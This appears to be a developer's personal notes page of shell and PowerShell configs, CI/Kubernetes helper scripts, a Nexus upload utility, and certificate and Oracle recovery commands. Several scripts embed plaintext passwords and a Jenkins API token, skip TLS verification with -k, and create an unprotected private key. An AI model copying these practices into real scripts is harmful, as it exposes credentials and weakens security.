My environment setting

Starship (~/.config/starship.toml)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
add_newline = false

[line_break]
disabled = true

[directory]
truncate_to_repo = false
truncation_length = 5

[character]
success_symbol = "[➜](bold green)"

[git_branch]
symbol = "🌱 "
style = "bold yellow"

Scoop installed apps (~\scoop\shims)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
7zip     22.01   main   2022-11-25 20:29:25
adb 33.0.3 main 2022-09-29 18:06:51
dark 3.11.2 main 2022-12-08 17:56:35
fd 8.5.3 main 2022-12-09 10:57:01
fzf 0.33.0 main 2022-09-28 10:35:52
gcc 11.2.0 main 2022-12-13 15:18:08
gitui 0.22.1 main 2022-11-25 20:29:43
lazygit 0.36.0 extras 2022-12-09 11:08:51
llvm 15.0.6 main 2022-12-13 14:47:18
neovim 0.8.1 main 2022-12-09 10:39:39
python 3.11.1 main 2022-12-08 17:57:36
ripgrep 13.0.0 main 2022-12-09 10:59:32
scrcpy 1.24 main 2022-09-29 18:06:57
starship 1.10.3 main 2022-10-14 11:11:06

Powershll $PROFILE

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
function st {git status .}
function br {git branch @Args}
function di {git difftool @Args}
function ad {git add @Args}
function ci {git commit @Args}
function log {git log --name-only @Args}
function log2 {git log --name-only --grep @Args}
function log3 {git log --graph --pretty=oneline --abbrev-commit --name-only}
function di2 {git difftool head~10 @Args}
function co {git checkout @Args}
function me {git merge --no-ff @Args}
function pi {git cherry-pick @Args}
function pull {git pull origin develop ; echo "pull develop"}
function push {git push origin develop ; echo "push develop"}
function pull2 {git pull origin master ; echo "pull master"}
function push2 {git push origin master ; echo "push master"}
function pull3 {git pull origin sit ; echo "pull sit"}
function push3 {git push origin sit ; echo "push sit"}
function pull4 {git pull origin uat ; echo "pull uat"}
function push4 {git push origin uat ; echo "push uat"}
function pull5 {git pull origin prod ; echo "pull prod"}
function push5 {git push origin prod ; echo "push prod"}

function pu {git push origin @Args}

function kc {kubectl @Args}

function ed {C:\Users\user\Desktop\my\Tool\EditPlus\editplus.exe @Args}

function change-to-develop {co develop}

set-alias cod change-to-develop
set-alias vi nvim

######### zoxide
Invoke-Expression (& {
$hook = if ($PSVersionTable.PSVersion.Major -lt 6) { 'prompt' } else { 'pwd' }
(zoxide init --hook $hook powershell | Out-String)
})


######### PSFzf
# Import-Module PSFzf

# Override PSReadLine's history search
# Set-PsFzfOption -PSReadlineChordProvider 'Ctrl+f' `
# -PSReadlineChordReverseHistory 'Ctrl+r'

# Override default tab completion
# Set-PSReadLineKeyHandler -Key Tab -ScriptBlock { Invoke-FzfTabCompletion }

# $env:FZF_DEFAULT_OPTS="--height=40% --layout=reverse --info=inline --border --margin=1 --padding=1"

####### color theme
# C:\Users\user\Desktop\my\app\ColorTool\ColorTool.exe solarized_light.itermcolors



Invoke-Expression (&starship init powershell)


Set-PSReadLineKeyHandler -Key Ctrl+b `
-BriefDescription BuildCurrentDirectory `
-LongDescription "Build current project" `
-ScriptBlock {
[Microsoft.PowerShell.PSConsoleReadLine]::RevertLine()
[Microsoft.PowerShell.PSConsoleReadLine]::Insert("gradle build -xtest")
[Microsoft.PowerShell.PSConsoleReadLine]::AcceptLine()
}

Set-PSReadLineKeyHandler -Key Ctrl+p `
-BriefDescription BuildCurrentDirectory `
-LongDescription "Build and publish current project" `
-ScriptBlock {
[Microsoft.PowerShell.PSConsoleReadLine]::RevertLine()
[Microsoft.PowerShell.PSConsoleReadLine]::Insert("gradle build publishtomavenlocal")
[Microsoft.PowerShell.PSConsoleReadLine]::AcceptLine()
}

Set-PSReadLineKeyHandler -Key Ctrl+d `
-ScriptBlock {
[Microsoft.PowerShell.PSConsoleReadLine]::RevertLine()
[Microsoft.PowerShell.PSConsoleReadLine]::Insert("exit")
[Microsoft.PowerShell.PSConsoleReadLine]::AcceptLine()
}


function mem_used {
$CompObject = Get-WmiObject -Class WIN32_OperatingSystem
$Memory = ((($CompObject.TotalVisibleMemorySize - $CompObject.FreePhysicalMemory)*100)/ $CompObject.TotalVisibleMemorySize)

Write-Host "Memory usage in Percentage:" $Memory

# Top 10 process Memory Usage (MB)
$processMemoryUsage = Get-WmiObject WIN32_PROCESS | Sort-Object -Property ws -Descending | Select-Object -first 10 processname, @{Name="Mem Usage(MB)";Expression={[math]::round($_.ws / 1mb)}}
$processMemoryUsage
}

function battery {
WMIC PATH Win32_Battery Get EstimatedChargeRemaining
}


####### fzf
function fe { fzf | %{ ed $_ } }


####### shortcut
set-alias lg lazygit
set-alias gt gitui

Scripts

synchronize argocd (sy)

1
2
3
4
5
6
7
8
9
10
11
12
13
SERVICE_SHORT_FORM=$1
ARGOCD_TOKEN=$(curl -s https://argocd.apps.xxxp2-dev.local/api/v1/session -k -d '{"username":"my","password":"x1xrhqbwdg"}' | jq -r .token)

echo $ARGOCD_TOKEN

case $SERVICE_SHORT_FORM in
l)
SERVICE=login-service ;;
o)
SERVICE=operation-service ;;
esac

curl -XPOST https://argocd.apps.xxxp2-dev.local/api/v1/applications/$SERVICE/sync -H "Authorization: Bearer $ARGOCD_TOKEN" -k|jq .status.sync

set image (si)

1
2
3
4
5
6
7
8
9
10
11
SERVICE_SHORT_FORM=$1
DIGEST=$2

case $SERVICE_SHORT_FORM in
l)
SERVICE=login-service ;;
o)
SERVICE=operation-service ;;
esac

kubectl set image deployment/$SERVICE $SERVICE=repo.xxxp2-dev.local:5000/$SERVICE@sha256:$2

build Jenkins (bu)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
SERVICE_SHORT_FORM=$1

case $SERVICE_SHORT_FORM in
c)
SERVICE=common-library ;;
l)
SERVICE=login-service ;;
o)
SERVICE=operation-service ;;
esac

case $2 in
d) ENV=develop ;;
s) ENV=sit ;;
u) ENV=uat ;;
p) ENV=prod ;;
esac

#echo "build $SERVICE env: " $ENV
#curl -k -X POST -FSubmit=Build -u my:11e3706cf992e438dff8212e261a99e645 https://ci.xxxp2-dev.local/job/$SERVICE/buildWithParameters?environment=$ENV

echo "build $SERVICE env: " $ENV
if [[ -z "$ENV" ]]
then
curl -k -X POST -FSubmit=Build -u my:11e3706cf992e438dff8212e261a99e645 https://ci.xxxp2-dev.local/job/$SERVICE/build
else
curl -k -X POST -FSubmit=Build -u my:11e3706cf992e438dff8212e261a99e645 https://ci.xxxp2-dev.local/job/$SERVICE/buildWithParameters?environment=$ENV
fi

build process in Jenkins (bp)

1
2
3
4
5
6
7
8
9
10
11
12
13
SERVICE_SHORT_FORM=$1

case $SERVICE_SHORT_FORM in
c)
SERVICE=common-library ;;
l)
SERVICE=login-service ;;
v)
esac


curl -s -k -X POST -FSubmit=Build -u my:11e3706cf992e438dff8212e261a99e645 https://ci.xxxp2-dev.local/job/$SERVICE/lastBuild/api/xml?tree=building,timestamp,estimatedDuration|xq
#curl -s -k -X POST -FSubmit=Build -u my:11e3706cf992e438dff8212e261a99e645 https://ci.xxxp2-dev.local/job/common-api/lastBuild/api/json|jq .artifacts

show logs for k8s pod (po)

1
2
3
4
kubectl get pods  | fzf --info=inline --layout=reverse --header-lines=1 \
--bind 'enter:execute:kubectl logs -f {1}' \
--preview-window up:follow \
--preview 'kubectl logs --follow --tail=100 {1}' "$@"

Gradle build publish / Curl to Nexus

Publish/upload artifacts with Gradle or curl

1
2
3
4
5
6
7
8
9
10
11
12
13
gradle build publish -Djavax.net.ssl.trustStore=C:\Users\user\Desktop\me\workspace\me\kw-cacerts -Djavax.net.ssl.trustStorePassword=changeit -PNEXUS_REPO_URL=https://repo.2pswt.local:8443/repository/maven-releases/ -PNEXUS_REPO_USER=me -PNEXUS_REPO_PASSWORD=abc123.


Direct upload
curl -x socks5h://localhost:8580 -k -v -u me:my-passwd --upload-file httpcore-4.4.12.pom https://repo.2pswt.local:8443/repository/maven-releases/org/apache/httpcomponents/httpcore/4.4.12/httpcore-4.4.12.pom

curl -x socks5h://localhost:8580 -k -v -u me:my-passwd --upload-file spring-data-redis-2.5.6.jar https://repo.2pswt.local:8443/repository/maven-releases/org/springframework/data/spring-data-redis/2.5.6/spring-data-redis-2.5.6.jar

Upload jar with auto generating pom.xml
curl -x socks5h://localhost:8580 -k -v -u me:my-passwd -F "maven2.generate-pom=true" -F "maven2.groupId=spring-data-redis" -F "maven2.artifactId=spring-data-redis" -F "maven2.packaging=jar" -F "version=2.5.6" -F "maven2.asset1=@spring-data-redis-2.5.6.jar;type=application/java-archive" -F "maven2.asset1.extension=jar" "https://repo.2pswt.local:8443/service/rest/v1/components?repository=maven-releases"

Upload jar and pom.xml (failed)
curl -x socks5h://localhost:8580 -k -v -u me:my-passwd -F "maven2.generate-pom=false" -F "maven2.asset1=@spring-data-redis-2.5.6.pom" -F "maven2.asset1.extension=pom" -F "maven2.asset2=@spring-data-redis-2.5.6.jar;type=application/java-archive" -F "maven2.asset2.extension=jar" "http://repo.2pswt.local:8443/service/rest/v1/components?repository=maven-releases"

Using sock5 proxy to clone git repo

1
2
3
4
5
git clone https://git.2pwst.local/wst-dev/xxx-service --config "http.proxy=socks5://127.0.0.1:8580"

git config --global https.proxy "socks5://127.0.0.1:8080"
git config --global --unset http.proxy
git config --global --unset https.proxy

Reference
https://help.sonatype.com/repomanager3/integrations/rest-and-integration-api/components-api
https://help.sonatype.com/repomanager3/integrations/rest-and-integration-api/search-api

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
package hk.gov.cedb.tsw.upload;

import java.io.BufferedWriter;
import java.io.FileWriter;
import java.io.IOException;
import java.nio.file.FileVisitOption;
import java.nio.file.Files;
import java.nio.file.Paths;

import org.apache.commons.lang3.StringUtils;

public class UploadArtificatToNexus {
static String gradleCacheDir = "C:\\Users\\user\\.gradle\\caches\\modules-2\\files-2.1\\com.squareup.okhttp3"; // append folder name here for upload specified package e.g. io.projectreactor

static String filterVersion = ""; // e.g. 3.4.18

static String repoUser = "me";
static String repoPwd = "my-passwd";

// clear gradle cache in server, rm -rf $HOME/.gradle/caches/

static String uploadJarScript = "curl -x socks5h://localhost:8580 -k -v -u " + repoUser + ":" + repoPwd + " -F \"maven2.generate-pom=false\" "
+ "-F \"maven2.groupId=%s\" -F \"maven2.artifactId=%s\" -F \"maven2.packaging=jar\" "
+ "-F \"version=%s\" -F \"maven2.asset1=@%s;type=application/java-archive\" "
+ "-F \"maven2.asset1.extension=jar\" \"https://repo.tswp2-dev.local:8443/service/rest/v1/components?repository=maven-releases\"";

static String uploadPomScript = "curl -x socks5h://localhost:8580 -k -v -u " + repoUser + ":" + repoPwd + " --upload-file %s "
+ "https://repo.tswp2-dev.local:8443/repository/maven-releases/%s/%s/%s/%s";

static String uploadNpmScript = "curl -x socks5h://localhost:8580 -k -v -u " + repoUser + ":" + repoPwd
+ " -F \"npm.asset=@C:\\Users\\user\\Downloads\babel-plugin-11.9.2.tgz;type=application/x-compressed\" "
+ "https://repo.tswp2-dev.local:8443/service/rest/v1/components?repository=npm-releases";

public static void main(String[] args) throws IOException {
uploadArtifact();
}

private static void uploadArtifact() throws IOException {
BufferedWriter fw = new BufferedWriter(new FileWriter("d:/artifacts.txt"));
try {
Files.walk(Paths.get(gradleCacheDir),
FileVisitOption.FOLLOW_LINKS).forEach(f -> {
try {
if (f.toFile().isDirectory()) {
return;
}

String fileName = f.getFileName().toString();

if (fileName.contains("source")) {
return;
}

String version = f.getParent().getParent().toFile().getName();

if (StringUtils.isNotBlank(filterVersion) && !filterVersion.equals(version)) {
return;
}

String artifactId = f.getParent().getParent().getParent().toFile().getName();

String groupId = f.getParent().getParent().getParent().getParent().toFile().getName();

// System.out.println(String.format("%s/%s/%s/%s", groupId.replaceAll("\\.", "/"), artifactId, version, fileName));

if (fileName.endsWith(version + ".jar")) {
String line = String.format(uploadJarScript, groupId, artifactId, version, f.toAbsolutePath().toAbsolutePath());
System.out.println(line);
fw.append(line + "\r\n");
}

if (fileName.endsWith(version + ".pom")) {
String line = String.format(uploadPomScript, f.toAbsolutePath(), groupId.replaceAll("\\.", "/"), artifactId, version, fileName);
System.out.println(line);
fw.append(line + "\r\n");
}

fw.flush();
} catch (IOException e) {
e.printStackTrace();
}
});

fw.close();
} catch (IOException e) {
e.printStackTrace();
}
}
}

k8s poc

A very prilimiary project for proof of concept on following items,

  1. Support multiplie user login
    (re-implement session managment logic without spring-session and spring-security)

  2. Concurrent update control

Prerequisites

JDK 11+

Gradle 6.8

NodeJS v14

H2 DB v1.4.199

Redis 3.2

MariaDB Server 10.6 (Optional)

MySQL Workbench 8.0 CE

Docker Desktop (Optional)

To setup the environment and run the demo

Add below entry at C:\Windows\System32\drivers\etc\hosts

1
2
3
4
5
6
7
127.0.0.1	xxx.local.hk
127.0.0.1 session-service.local.hk
127.0.0.1 login-service.local.hk
127.0.0.1 profile-service.local.hk
127.0.0.1 redis-server.local.hk
127.0.0.1 mariadb-server.local.hk
127.0.0.1 h2db-server.local.hk

MariaDB (Optional)

  • Download and install MariaDB
  • Run the scripts in file config\MariaDB\create-db.txt to create database and data initialization.

H2 DB

  • Go to config\h2 folder and run the script h2_server.bat in command prompt
  • Run below scripts to create database file in baseDir defined in h2_server.bat
    java -cp h2-1.4.199.jar org.h2.tools.Shell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
Welcome to H2 Shell 1.4.199 (2019-03-13)
Exit with Ctrl+C
[Enter] jdbc:h2:tcp://localhost/~/test
URL jdbc:h2:c:/Users/user/test
[Enter] org.h2.Driver
Driver
[Enter] sa
User
Password
Type the same password again to confirm database creation.
Password
Connected
Commands are case insensitive; SQL statements end with ';'
help or ? Display this help
list Toggle result list / stack trace mode
maxwidth Set maximum column width (default is 100)
autocommit Enable or disable autocommit
history Show the last 20 statements
quit or exit Close the connection and exit
  • Run the scripts in file config\MariaDB\create-db.txt to create tables and data initialization.

Redis

  • Download and install Redis
  • Backup the redis.windows-service.conf file in Redis Installation folder and replace it with config\redis\redis.windows-service.conf
  • Run following commands with Adminstrator permission
    net stop redis && net start redis

Go to session-service directory and run below script in command prompt

gradle build && java -Dcommon.properties=..\config\common.properties -jar build\libs\session-service-1.0.war

Go to login-service directory and run below script in command prompt

gradle build && java -Dcommon.properties=..\config\common.properties -jar build\libs\login-service-1.0.war

Go to profile-service directory and run below script in command prompt

gradle build && java -Dcommon.properties=..\config\common.properties -jar build\libs\profile-service-1.0.war

Go to frontend directory and run below script in command prompt

1
2
npm install
npm start

The project is also able to build and run with docker

  • Build the services session-service, login-service and profile-service respectively by using Gradle
  • Go to directory container and run following commands
  • Build all images by command build-all.bat
  • Startup the application by command startup-all.bat
  • Create tables USER and SESSION, and corresponding records in MariaDB via MySQL Workbench
  • Refer to above H2 DB section, create database, table and records

Test the application

  • Open a new browser tab or window with the URL http://xxx-poc:3000/login in your address bar.
  • To view the database structure open MySQL Workbench and input connection information from file config\mariadb\create-db.sql.

Next…

Deploy the code to OKD, minikube, CodeReady Containers and KinD later

Fix problem of PullImageErr even successfully validate new docker image from external registry for deployment

Add imagePullSecret under below YAML

1
2
3
4
Administrator -> User Management -> Service Accounts -> default -> YAML
imagePullSecrets:
- name: default-dockercfg-49c54
- name: repo-secrect (it comes from Workloads -> Secrets)

Or run following script

openshift-deploy-an-application-from-private-registry
service_accounts in openshift
image-pull-secrets

1
2
3
4
5
6
7
8
9
10
11
12
13
14
oc create secret docker-registry repo-secrect \
--docker-server=repo.lab.company.com \
--docker-username=<user_name> \
--docker-password=<password> \
--docker-email=unused
```

`oc secrets link default repo-secrect --for=pull`

## Manage and deploy containers in OKD platform
* Following commands come from
https://design.jboss.org/redhatdeveloper/marketing/openshift_cheatsheet/cheatsheet/images/openshift_cheat_sheet_r2v1.pdf
https://gist.github.com/rafaeltuelho/111850b0db31106a4d12a186e1fbc53e

oc login
oc status
oc logs
oc describe pod
oc describe svc
oc get is
oc get pods
oc get svc
oc get routes
oc get deployment
oc del is
oc del pod
oc exec cat /opt/app-root/myapp.config
oc rsh
oc debug dc

Redeploy images from repo.lab.company.com

oc delete deployment frontend
oc delete svc frontend
oc delete is frontend
oc delete route frontend

Check service account

oc describe sa

Create deployment

oc new-app repo.lab.company.com/myname/xxx-poc/login-service:latest –name=my-application
oc delete deployment application

1
2
3
4

* odo commands from
https://odo.dev/docs/getting-started/basics
https://docs.openshift.com/container-platform/4.9/cli_reference/developer_cli_odo/understanding-odo.html

odo login -umyname
odo project create quickstart
odo catalog list services

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

* add configmap
```
oc create configmap xxx-poc-config --from-env-file=common.properties --dry-run=client -o yaml > configMap.yml
oc create configmap xxx-poc-config --from-file=common.properties
oc apply -f configMap.yml

oc describe configmap xxx-poc-config

oc get configmap xxx-poc-config -o yaml

----
oc delete configmap xxx-poc-config2

oc get deployment session-service -o yaml > orig-deployment.txt
oc apply -f add-configmap-deployment.yaml

Recover inconsistent/corrupt data file in Oracle DB

Fix: ORA-01194: file 1 needs more recovery to be consistent

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
SQL> sqlplus sys/sys as sysdba

SQL> alter database open resetlogs;

SQL> recover database using backup controlfile until cancel;
...
Specify log: {<RET>=suggested | filename | AUTO | CANCEL}
AUTO

SQL> alter database open resetlogs;

SQL> shutdown immediate

SQL> startup mount

SQL> ALTER SYSTEM SET "_allow_resetlogs_corruption"= TRUE SCOPE = SPFILE;
SQL> ALTER SYSTEM SET undo_management=MANUAL SCOPE = SPFILE;

SQL> shutdown immediate

SQL> startup mount

SQL> alter database open resetlogs;
Database altered.

SQL> CREATE UNDO TABLESPACE undo2 datafile 'D:\oraclexe\app\oracle\oradata\XE\undo2_df1.dbf' size 200m autoextend on maxsize 20G;
Tablespace created.

SQL> alter system set undo_tablespace = undo2 scope=spfile;
System altered.

SQL> alter system set undo_management=auto scope=spfile;
System altered.

SQL> shutdown immediate
SQL> startup

Reference:
https://dbatricksworld.com/ora-01194-file-1-needs-more-recovery-to-be-consistent/
http://blog.itpub.net/77164/viewspace-668388/
https://stackoverflow.com/questions/53676/how-to-resolve-ora-011033-oracle-initialization-or-shutdown-in-progress

Install Certificate From Let's Encrypt To Tomcat

Got 3 files from https://www.sslforfree.com/

1
2
3
certificate.crt
ca_bundle.crt
private.key

Web server is tomcat, merge those files into a keystore

1
2
3
4
5
6
7
8
9
10
11
12
openssl pkcs12 -export -in certificate.crt -inkey private.key -certfile certificate.crt -out testkeystore.p12

keytool -importkeystore -srckeystore testkeystore.p12 -srcstoretype pkcs12 -destkeystore ks.jks -deststoretype JKS

keytool -changealias -keystore ks.jks -alias 1
=> alias: tomcat

password: lles1234

keytool -import -trustcacerts -alias root -file ca_bundle.crt -keystore ks.jks

keytool -import -trustcacerts -alias lles -file certificate.crt -keystore ks.jks

Test the cert

1
openssl s_connect -showcerts -connect 127.0.0.1:443

server.xml

1
2
3
4
5
<Connector port="443" protocol="HTTP/1.1"
SSLEnabled="true"
scheme="https" secure="true" clientAuth="false"
sslProtocol="TLS" keystoreFile="/your_path/ks.jks"
keystorePass="lles1234" />

Reference:
https://www.sslforfree.com/#tutorials
https://www.namecheap.com/support/knowledgebase/article.aspx/9423/33/installing-an-ssl-certificate-on-apache
https://www.namecheap.com/support/knowledgebase/article.aspx/9441/33/installing-an-ssl-certificate-on-tomcat
https://www.cyberciti.biz/faq/test-ssl-certificates-diagnosis-ssl-certificate/

Sign Jar

generate certitficate signing request

1
2
3
4
keytool -certreq -alias xxx -keystore xxx_signing.jks -file certreq.pem.2
keytool -importcert -alias inter -file intermediate.pem -keystore xxx_signing.jks -storepass yyy.xxx@2017
keytool -importcert -alias root -file root.pem -keystore xxx_signing.jks -storepass yyy.xxx@2017
keytool -importcert -alias xxx -file signedcert.pem -keystore xxx_signing.jks -storepass yyy.xxx@2017
1
2
keytool -printcertreq -file certreq.pem
openssl req -in certreq.pem -noout -text

sign jnlp jar

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
D:\signjar> mkdir hk\gov\ogcio
D:\signjar> mkdir hk\gov\xxx\user\fxbrowser

xxx\public\bin>
xcopy /y hk\gov\ogcio /s D:\signjar\bin\hk\gov\ogcio
xcopy /y hk\gov\xxx\user\fxbrowser /s D:\signjar\bin\hk\gov\xxx\user\fxbrowser
copy smartid.properties D:\signjar\bin
copy pkcs12.properties D:\signjar\bin
copy etoken.properties D:\signjar\bin

jar -cf fxbrowser.jar -C bin/ .
jar ufm fxbrowser.jar Manifest.txt
pack200 --repack fxbrowser.jar
// pack200 --repack itextpdf-5.5.6.jar
// pack200 --repack bcprov-jdk15on-1.56.jar
// pack200 --repack bcpkix-jdk15on-1.56.jar

jarsigner -tsa http://sha256timestamp.ws.symantec.com/sha256/timestamp -keystore xxx_signing.jks fxbrowser.jar xxx -storepass yyy.xxx@2017
jarsigner -tsa http://sha256timestamp.ws.symantec.com/sha256/timestamp -keystore xxx_signing.jks itextpdf-5.5.6.jar xxx -storepass yyy.xxx@2017
jarsigner -tsa http://sha256timestamp.ws.symantec.com/sha256/timestamp -keystore xxx_signing.jks bcprov-jdk15on-1.56.jar xxx -storepass yyy.xxx@2017
jarsigner -tsa http://sha256timestamp.ws.symantec.com/sha256/timestamp -keystore xxx_signing.jks bcpkix-jdk15on-1.56.jar xxx -storepass yyy.xxx@2017

pack200 fxbrowser.jar.pack.gz fxbrowser.jar
pack200 itextpdf-5.5.6.jar.pack.gz itextpdf-5.5.6.jar
pack200 bcprov-jdk15on-1.56.jar.pack.gz bcprov-jdk15on-1.56.jar
pack200 bcpkix-jdk15on-1.56.jar.pack.gz bcpkix-jdk15on-1.56.jar

del fxbrowser__V1.4.jar.pack.gz
rename fxbrowser.jar.pack.gz fxbrowser__V1.4.jar.pack.gz
rename itextpdf-5.5.6.jar.pack.gz itextpdf-5.5.6__V1.0.jar.pack.gz
rename bcprov-jdk15on-1.56.jar.pack.gz bcprov-jdk15on-1.56__V1.0.jar.pack.gz
rename bcpkix-jdk15on-1.56.jar.pack.gz bcpkix-jdk15on-1.56__V1.0.jar.pack.gz

copy /y fxbrowser__V1.4.jar.pack.gz C:\Users\my\Desktop\Forrest\workspace\xxx\public\src\main\resources\public\user
copy /y fxbrowser__V1.4.jar.pack.gz Y:\public\bin\public\user

Reference

https://docs.oracle.com/cd/E19509-01/820-3503/ggezu/
https://blogs.oracle.com/blogbypuneeth/steps-to-create-a-csr-certificate-signing-request-using-keytool-and-get-it-signed-from-an-external-ca-certificate-authority-thawte
http://docs.oracle.com/javase/7/docs/technotes/guides/jweb/security/rsa_signing.html

Import certificate

1
keytool -import -trustcacerts -keystore xxx_signing.jks -alias xxx -file ssl_certificate.p7b

Add key entry to xxx_signing.jks for pdf signing

1
2
3
4
5
6
7
8
9
10
useless:
openssl pkcs12 -export -inkey www.dummy.gov.hk-privateKey.key -in www.dummy.gov.hk.crt -name xxx-cert -out xxx-cert.p12
keytool -importkeystore -srckeystore ..\apache\ssl\public\xxx-cert.p12 -srcstoretype pkcs12 -alias xxx-cert -destkeystore xxx_signing.jks

self-sign:
openssl req -x509 -newkey rsa:2048 -keyout sign-pdf-cert-key.pem -out sign-pdf-cert.pem -days 3650
openssl x509 -text -noout -in sign-pdf-cert.pem (review cert)
openssl pkcs12 -inkey sign-pdf-cert-key.pem -in sign-pdf-cert.pem -export -name xxx-cert -out sign-pdf-cert.p12
openssl pkcs12 -in certificate.p12 -noout -info (validate p12 file)
keytool -importkeystore -srckeystore sign-pdf-cert.p12 -srcstoretype pkcs12 -alias xxx-cert -destkeystore xxx_signing.jks

jks location

1
D:\keystore\xxx_signing.jks comes from public\config\jws\xxx_signing.jks

Generate SSL Cert

generate private key

1
openssl genrsa -out xxx-privateKey.key 2048``` no passphase to protect private key

generate public certificate for domain of dummy.gov.hk

1
2
1. openssl req -out xxx.csr -new -newkey rsa:2048 -sha256 -nodes -key xxx-privateKey.key
2. openssl req -text -noout -verify -in xxx.csr

re-generate csr with same private key

1
2
3. openssl req -new -sha256 -nodes -out www.dummy.gov.hk.csr -key www.dummy.gov.hk-privateKey.key -config config.txt
4. openssl req -text -noout -verify -in www.dummy.gov.hk.csr > www.dummy.gov.hk.csr.verify.txt

generate private key for internal certificate for domain of *.dummy.hksarg

1
2
1. openssl req -new -sha256 -nodes -out dummy.hksarg.csr -newkey rsa:2048 -keyout xxx.hksarg-privateKey.key -config config.txt
2. openssl req -text -noout -verify -in dummy.hksarg.csr

generate 3 internal certificates for domain of *.dummy.hksarg by one private key

1
2
3
4
5
6
7
8
1. openssl req -new -sha256 -nodes -out sit.dummy.hksarg.csr -key xxx.hksarg-privateKey.key -config config.txt
2. openssl req -text -noout -verify -in sit.dummy.hksarg.csr > sit.xxx.hksarg.csr.verify.txt

1. openssl req -new -sha256 -nodes -out uat.dummy.hksarg.csr -key xxx.hksarg-privateKey.key -config config.txt
2. openssl req -text -noout -verify -in uat.dummy.hksarg.csr > uat.xxx.hksarg.csr.verify.txt

1. openssl req -new -sha256 -nodes -out dummy.hksarg.csr -key xxx.hksarg-privateKey.key -config config.txt
2. openssl req -text -noout -verify -in dummy.hksarg.csr > dummy.hksarg.csr.verify.txt

convert p7b cert format to PEM

1
2
3
openssl pkcs7 -print_certs -inform der -in certnew-der.p7b > sit.dummy.hksarg.crt
openssl pkcs7 -print_certs -inform der -in certnew-der.p7b > uat.dummy.hksarg.crt
openssl pkcs7 -print_certs -inform der -in certnew-der.p7b > dummy.hksarg.crt

conbime cert and cacert

1
2
3
4
5
openssl x509 -in cert0002107503.cer -subject -issuer -out cert0002107503.crt
openssl x509 -in ecert_ca_1-15_pem.crt -subject -issuer -out ecert_ca_1-15_pem.crt
openssl x509 -in root_ca_1_pem.crt -subject -issuer -out root_ca_1_pem.crt

cat cert0002107503.crt ecert_ca_1-15_pem.crt root_ca_1_pem.crt > www.dummy.gov.hk.crt

Instal RM

Export some dependencies like org.dom4j and javax.jms.api in jboss-deployment-structure.xml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
egis_rm_paymentrecon-dept_web
<jboss-deployment-structure xmlns="urn:jboss:deployment-structure:1.1">
<deployment>
<resources>
<resource-root path="lib/bcprov-jdk15on-1.51.jar" use-physical-code-source="true"/>
</resources>
<dependencies>
<!-- for quartz -->
<module name="com.mysql" export="true"/>
</dependencies>
</deployment>
</jboss-deployment-structure>

egis_rm_paymentrecon-portal_web
<jboss-deployment-structure xmlns="urn:jboss:deployment-structure:1.2">
<deployment>
<dependencies>
<!-- for castor, don't know which XML serializer is configured -->
<!-- therefore, include both from JDK and Xerces -->
<system export="true">
<paths>
<path name="com/sun/org/apache/xml/internal/serialize" />
</paths>
</system>

<module name="org.apache.xalan" export="true" />
<module name="org.apache.xerces" export="true" />
<module name="org.dom4j" export="true" />

<!-- for quartz -->
<module name="com.mysql" export="true" />
</dependencies>
</deployment>
</jboss-deployment-structure>

Add application user for role keyservice_admin by calling bin/add-user.bat

Update standalone.conf to add RM config path

1
set "JAVA_OPTS=%JAVA_OPTS% -Dhk.gov.ogcio.egis.rm.common.PROPERTIES_FILEPATH=D:\rm -Djboss.bind.address=0.0.0.0 -Dspring.profiles.active=uat"

Generate key store

1
2
3
4
5
6
7
8
9
10
keytool -genkey -keystore xxx_master.jks -keyalg RSA -keysize 2048 -alias my-alais -validity 3650 -storepass yyy.xxx@2017
*** CN=Companies Registry, OU=Companies Registry, O=Companies Registry, L=Hong Kong, ST=Hong Kong, C=HK ***
keytool -list -v -keystore xxx_master.jks

Copy xxx\rm2\keys\sit\xxx_master.jks to d:/keystore

Generate master password in DB
java -cp C:\Users\xxx01\Desktop\Forrest\workspace\RM2-Keyservice\bin;C:\Users\xxx01\Desktop\Forrest\workspace\RM2-Common\bin hk.gov.ogcio.egis.rm.keyservice.utils.KeystoreInstallSuite /d:/keystore/xxx_master.jks JKS yyy.xxx@2017 my-alais yyy.xxx@2017 SHA256 RSA/ECB/OAEPWithSHA1AndMGF1Padding

